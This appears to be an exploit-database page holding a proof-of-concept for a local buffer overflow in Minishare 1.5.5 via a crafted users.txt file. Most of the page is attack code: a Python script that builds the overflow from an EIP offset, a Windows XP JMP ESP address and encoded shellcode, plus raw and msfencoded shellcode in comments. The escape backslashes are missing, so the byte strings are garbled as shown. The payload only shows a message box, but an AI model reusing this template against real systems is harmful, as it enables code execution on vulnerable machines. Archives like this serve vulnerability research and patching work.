Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)
# Published : 2010-11-02
# Author : Chris Gabriel
# Previous Title : Minishare 1.5.5 Buffer Overflow Vulnerability (SEH)
# Next Title : Trend Micro Titanium Maximum Security 2011 0day Local Kernel Exploit

# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)
# Date: 11/02/2010
# Author: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.4.0 - 1.5.5
# Tested on: Windows XP SP3 EN
# CVE: 

# MessageBoxA TITLE=HAX TEXT=HAX WIN XP SP3 Shellcode
# xbbx48x41x58x00x53x89xe6x31xc0x50x56x56x50
# xb8xeax07x45x7exffxd0

# msfencoded MessageBoxA shellcode
# [*] x86/shikata_ga_nai succeeded with size 48 (iteration=1)
# x33xc9xb1x06xdaxd2xd9x74x24xf4x5bxb8x1fxf9
# xf2x17x83xebxfcx31x43x10x03x43x0fx1bx07xac
# x67x9axb0xd3x24x95xa7xe5x0axf5x71x50xdax4e
# x97x5bx9fxd0x97xb4

# ALPHA3.py x86 ascii uppercase ESP --input="shellcode-encoded"
# alpha3 encoded ascii uppercase MessageBoxA Shellcode
shellcode = (
"TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D"
"QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3"
"M3Z19LN2A2Z1G0N2K0N4YK0JO9L9Q1S36403F0G3V2K1"
"Q9S123I1Y3N9R8M4E0G"
)

# 78 bytes till EIP
# 82 bytes till ESP
# 304 for payload
# EIP OVERWRITE
buff = "A" * 78
buff += "x4bx49x48x7e" #7E48494B JMP ESP in user32.dll win xp sp3
buff += shellcode

try:
 	f = open("users.txt",'w')
	f.write(buff)
	f.close()
	print "[+] Vulnerable file created!  Place the 'users.txt' file in the Minishare directory and run the program...n" 
except:
	print "[-] Error occured!"